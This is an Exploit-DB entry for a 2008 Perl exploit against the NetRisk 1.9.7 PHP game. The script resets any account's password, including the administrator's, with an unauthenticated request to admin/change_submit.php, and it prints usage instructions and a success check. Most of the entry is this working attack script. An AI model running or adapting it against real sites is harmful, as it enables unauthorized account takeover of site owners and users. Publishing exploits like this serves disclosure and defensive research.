NetRisk 1.9.7 - Remote Password Change

EDB-ID:

4842

CVE:

2008-7155

EDB Verified:

Author:

Cod3rZ

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2008-01-05

Vulnerable App: 
#!/usr/bin/perl
#=========================================================================================================================#
#                               _ ____             _        _ _                _                                          #
#                    __ ___  __| |__ /_ _ ___     | |_  ___| | |_____ __ _____| |__       ___ _  _                        #
#                   / _/ _ \/ _` ||_ \ '_|_ /  _  | ' \/ -_) | / _ \ V  V / -_) '_ \  _  / -_) || |                       #
#                   \__\___/\__,_|___/_| /__| (_) |_||_\___|_|_\___/\_/\_/\___|_.__/ (_) \___|\_,_|                       #
#=========================================================================================================================#
# Author: Cod3rZ                                                                                                          #
# Site: http://cod3rz.helloweb.eu                                                                                         #
#=========================================================================================================================#
# Status: Public                                                                                                          #
#=========================================================================================================================#
# Board: NetRisk 1.9.7                                                                                                    #
# Download: http://phprisk.org/netrisk_1.9.7.zip                                                                          #
#=========================================================================================================================#
# Vuln Type: Remote Password Change [Exploit]                                                                             #
# Severity:  Highest                                                                                                      #
#=========================================================================================================================#
# The ACP haven't control and we can change the password of the other users                                               #
#=========================================================================================================================#
# http://[site]/admin/change_submit.php?username=[user]&new_pass=[newpass]                                                #
#=========================================================================================================================#
# NetRisk contains a lot of bugs: RFI, SQL Injection, ecc; but this is the highest vuln and i wouldn't post those         #
#=========================================================================================================================#
use LWP::UserAgent;
use HTTP::Request::Common;
$lwp = new LWP::UserAgent;
system('cls');
$site = $ARGV[0];
$user = $ARGV[1];
$pass = $ARGV[2];
print q{ ---------------------------------------------------------------------
           :: NetRisk 1.9.7 Remote Password Change Exploit ::
 ---------------------------------------------------------------------
 Author : Cod3rZ
 Email  : songforthemoment@yahoo.it
 Site   : http://cod3rz.helloweb.eu
 ---------------------------------------------------------------------};
if(!$site || !$user || !$pass)
{
print q{ 
 Usage: perl netrisk.pl [site] [user] [newpass]
 Usage: perl netrisk.pl site.com/netrisk admin 123456
 ---------------------------------------------------------------------};
system('exit');
} 
else {
print "
 Site: $site
 User: $user
 Pass: $pass
 ---------------------------------------------------------------------
 Waiting...
 ---------------------------------------------------------------------";
$connect = $lwp->request(GET $site."/admin/change_submit.php?username=".$user."&new_pass=".$pass);
$content = $connect->content;
if($content =~ /username->/) {
 print "
 Password Changed 
 ---------------------------------------------------------------------"; }
 else { print "
 Error
 ---------------------------------------------------------------------"; }
}
# http://cod3rz.helloweb.eu

# milw0rm.com [2008-01-05]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services